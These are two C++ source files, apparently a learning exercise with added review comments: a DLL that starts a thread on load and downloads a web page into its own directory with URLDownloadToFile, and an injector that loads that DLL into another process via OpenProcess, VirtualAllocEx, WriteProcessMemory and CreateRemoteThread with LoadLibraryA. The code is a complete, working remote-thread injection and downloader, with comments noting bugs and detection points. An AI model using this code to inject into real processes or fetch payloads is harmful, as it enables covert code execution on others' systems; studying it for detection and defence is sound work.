// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include "windows.h"
#include "tchar.h"
#include "Urlmon.h"
#pragma comment(lib, "urlmon.lib")
#define DEF_URL "http://biancheng.dnbcw.info/c/158628.html"
#define DEF_FILE_NAME "index.html"
// Handle of this DLL, recorded in DllMain and read by ThreadProc so that
// GetModuleFileName can resolve the DLL's own on-disk path.
HMODULE g_hMod= NULL;
// Worker thread started from DllMain: resolves this DLL's full path, swaps the
// file name for DEF_FILE_NAME and fetches DEF_URL into that location with
// URLDownloadToFile.
//
// lParam: unused.
// Returns FALSE (0) when the module path cannot be resolved or contains no
// backslash; otherwise 0 after the download attempt. The HRESULT from
// URLDownloadToFile is discarded, so a failed download is not distinguishable
// from success by the exit code.
DWORD WINAPI ThreadProc(LPVOID lParam)
{
char szPath[MAX_PATH] = {0};
// g_hMod is assigned in DllMain before this thread is created.
if (!GetModuleFileName(g_hMod, szPath, MAX_PATH))
{
return FALSE;
}
OutputDebugString(szPath);
// Locate the last path separator so the file name can be replaced in place.
char *p = strrchr(szPath, '\\');
if (!p)
{
return FALSE;
}
// NOTE(review): the size argument is MAX_PATH, but only
// MAX_PATH - (p + 1 - szPath) bytes remain after the separator, so the bound
// handed to strcpy_s overstates the destination buffer.
strcpy_s(p+1, MAX_PATH, DEF_FILE_NAME);
OutputDebugString(szPath);
// Blocking network fetch into the DLL's directory; return value not checked.
URLDownloadToFile(NULL, DEF_URL, szPath, 0, NULL);
return 0;
}
// DLL entry point. On DLL_PROCESS_ATTACH it records the module handle in
// g_hMod and starts ThreadProc on a new thread; the thread handle is closed
// immediately, so the worker is never joined or checked. All other reasons
// are ignored.
//
// Defender's note: a DLL that spawns a thread from DLL_PROCESS_ATTACH and then
// performs a network download is the characteristic shape of an injected
// downloader; thread creation and URLDownloadToFile calls originating from a
// freshly loaded module are worthwhile telemetry points.
//
// Returns TRUE unconditionally.
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
HANDLE hThread = NULL;
g_hMod = hModule;
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
OutputDebugString("注入成功,开始下载Url!");
// Work is deferred to a separate thread, presumably to keep the network I/O
// out of DllMain itself. CreateThread's result is not checked before
// CloseHandle, so a NULL handle would be passed through on failure.
hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
CloseHandle(hThread);
}
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
// remotethread.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "windows.h"
#include "tchar.h"
// Loads the DLL at szDllPath into the process dwPid by writing the path into
// the target's address space and running LoadLibraryA there on a new thread.
//
// dwPid:     ID of the target process.
// szDllPath: NUL-terminated path of the DLL to load; copied as bytes, so this
//            only works when the project is built without UNICODE (strlen on
//            an LPCTSTR).
// Returns TRUE once the remote thread has finished, FALSE/0 on any failure.
//
// Resource handling (review): hProcess is not closed on the failure paths
// after OpenProcess succeeds, and the remote buffer from VirtualAllocEx is
// never released with VirtualFreeEx. Failure returns mix FALSE and 0, which
// are the same value but inconsistent in style.
//
// Defender's note: the sequence OpenProcess(PROCESS_ALL_ACCESS) ->
// VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread pointing at
// LoadLibraryA is the textbook remote-thread injection pattern and is one of
// the most commonly monitored API chains in endpoint detection.
BOOL InjrctDll(DWORD dwPid, LPCTSTR szDllPath)
{
HANDLE hProcess = NULL, hThread = NULL;
HMODULE hMod = NULL;
LPVOID pRemoteBuf = NULL;
// Size of the path including its terminator; size_t narrowed to DWORD.
DWORD dwBufSize = strlen(szDllPath) +1;
LPTHREAD_START_ROUTINE pThreadProc;
//#1 Obtain a process handle from the process ID
if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid)))
{
// NOTE(review): dwPid and GetLastError() are DWORD but printed with %d.
printf("open process %d failed!!! [%d]\n", dwPid, GetLastError());
return FALSE;
}
//#2 Allocate memory in the target process sized for the DLL path
pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);
if (!pRemoteBuf)
{
printf("pRemoteBuf\n");
return FALSE;
}
//#3 Write the DLL path into the allocated memory
if (!WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL))
{
printf("WriteProcessMemory\n");
return FALSE;
}
//#4 Get the address of the LoadLibrary API
// Relies on kernel32.dll being mapped at the same address in the target as
// in this process, which is what makes the local GetProcAddress result usable
// remotely.
hMod = GetModuleHandle("kernel32.dll");
if (!hMod)
{
printf("hMod\n");
return FALSE;
}
pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod, "LoadLibraryA");
if (!pThreadProc)
{
printf("pThreadProc\n");
return 0;
}
// The remote thread's start routine is LoadLibraryA with the path as its arg.
hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);
if(!hThread)
{
printf("hThread\n");
return 0;
}
// Block until LoadLibraryA returns in the target; its result is not read.
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}
// Console entry point: calls InjrctDll with a hard-coded PID and DLL path,
// prints the outcome, then spins forever.
//
// argc/argv: unused; the target PID and path are compile-time constants, so
// the program must be rebuilt for any other target.
// The trailing `while(1);` is a busy loop that pins a CPU core; it never
// returns, so the `return 0;` after it is unreachable.
int _tmain(int argc, _TCHAR* argv[])
{
if (InjrctDll(42448, "E:\\qt_test\\creatremotethread\\remotethread\\Debug\\dll.dll"))
{
printf("succeed!!!\n");
}
else
{
printf("error!!!\n");
}
// Keeps the process alive (busy-waiting) after injection.
while(1);
return 0;
}